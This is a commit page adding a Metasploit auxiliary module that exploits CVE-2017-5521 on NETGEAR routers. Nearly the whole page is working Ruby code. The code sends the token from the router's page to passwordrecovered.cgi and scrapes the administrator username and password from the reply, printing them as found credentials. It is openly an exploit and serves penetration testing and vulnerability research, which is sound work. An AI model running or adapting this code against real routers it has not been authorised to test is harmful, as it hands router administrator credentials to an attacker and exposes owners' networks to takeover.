Land #7916, module for netgear password disclosure
commit
cba5e266f8
|
@ -0,0 +1,133 @@
|
|||
##
|
||||
# This module requires Metasploit: http://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'NETGEAR Administrator Password Disclosure',
|
||||
'Description' => %q{
|
||||
This module will collect the password for the `admin` user.
|
||||
The exploit will not complete if password recovery is set on the router.
|
||||
The password is recieved by passing the token generated from `unauth.cgi`
|
||||
to `passwordrecovered.cgi`. This exploit works on many different NETGEAR
|
||||
products. The full list of affected products is available in the 'References'
|
||||
section.
|
||||
|
||||
},
|
||||
'Author' =>
|
||||
[
|
||||
'Simon Kenin', # Vuln Discovery, PoC
|
||||
'thecarterb' # Metasploit module
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2017-5521' ],
|
||||
[ 'URL', 'https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2017-003/?fid=8911' ],
|
||||
[ 'URL', 'http://thehackernews.com/2017/01/Netgear-router-password-hacking.html'],
|
||||
[ 'URL', 'https://www.trustwave.com/Resources/SpiderLabs-Blog/CVE-2017-5521--Bypassing-Authentication-on-NETGEAR-Routers/'],
|
||||
[ 'URL', 'http://pastebin.com/dB4bTgxz'],
|
||||
[ 'EDB', '41205']
|
||||
],
|
||||
'License' => MSF_LICENSE
|
||||
))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString::new('TARGETURI', [true, 'The base path to the vulnerable application', '/'])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
# @return substring of 'text', usually a response from a server in this case
|
||||
def scrape(text, start_trig, end_trig)
|
||||
text[/#{start_trig}(.*?)#{end_trig}/m, 1]
|
||||
end
|
||||
|
||||
def run
|
||||
uri = target_uri.path
|
||||
uri = normalize_uri(uri)
|
||||
print_status("Checking if #{rhost} is a NETGEAR router")
|
||||
vprint_status("Sending request to http://#{rhost}/")
|
||||
|
||||
# will always call check no matter what
|
||||
is_ng = check
|
||||
|
||||
res = send_request_cgi({ 'uri' => uri })
|
||||
if res.nil?
|
||||
print_error("#{rhost} returned an empty response.")
|
||||
return
|
||||
end
|
||||
|
||||
if is_ng == Exploit::CheckCode::Detected
|
||||
marker_one = "id="
|
||||
marker_two = "\""
|
||||
token = scrape(res.to_s, marker_one, marker_two)
|
||||
if token.nil?
|
||||
print_error("#{rhost} is not vulnerable: Token not found")
|
||||
return
|
||||
end
|
||||
|
||||
if token == '0'
|
||||
print_status("If no creds are found, try the exploit again. #{rhost} returned a token of 0")
|
||||
end
|
||||
print_status("Token found: #{token}")
|
||||
vprint_status("Token found at #{rhost}/unauth.cgi?id=#{token}")
|
||||
|
||||
r = send_request_cgi({
|
||||
'uri' => "/passwordrecovered.cgi",
|
||||
'vars_get' => { 'id' => token }
|
||||
})
|
||||
|
||||
vprint_status("Sending request to #{rhost}/passwordrecovered.cgi?id=#{token}")
|
||||
|
||||
html = r.get_html_document
|
||||
raw_html = html.text
|
||||
|
||||
username = scrape(raw_html, "Router Admin Username", "Router Admin Password")
|
||||
password = scrape(raw_html, "Router Admin Password", "You can")
|
||||
if username.nil? || password.nil?
|
||||
print_error("#{rhost} returned empty credentials")
|
||||
return
|
||||
end
|
||||
username.strip!
|
||||
password.strip!
|
||||
|
||||
if username.empty? || password.empty?
|
||||
print_error("No Creds found")
|
||||
else
|
||||
print_good("Creds found: #{username}/#{password}")
|
||||
end
|
||||
else
|
||||
print_error("#{rhost} is not vulnerable: Not a NETGEAR device")
|
||||
end
|
||||
end
|
||||
|
||||
# Almost every NETGEAR router sends a 'WWW-Authenticate' header in the response
|
||||
# This checks the response for that header.
|
||||
def check
|
||||
|
||||
res = send_request_cgi({'uri'=>'/'})
|
||||
if res.nil?
|
||||
fail_with(Failure::Unreachable, 'Connection timed out.')
|
||||
end
|
||||
|
||||
# Checks for the `WWW-Authenticate` header in the response
|
||||
if res.headers["WWW-Authenticate"]
|
||||
data = res.to_s
|
||||
marker_one = "Basic realm=\""
|
||||
marker_two = "\""
|
||||
model = data[/#{marker_one}(.*?)#{marker_two}/m, 1]
|
||||
print_good("Router is a NETGEAR router (#{model})")
|
||||
return Exploit::CheckCode::Detected
|
||||
else
|
||||
print_error('Router is not a NETGEAR router')
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
end
|
||||
end
|
Loading…
Reference in New Issue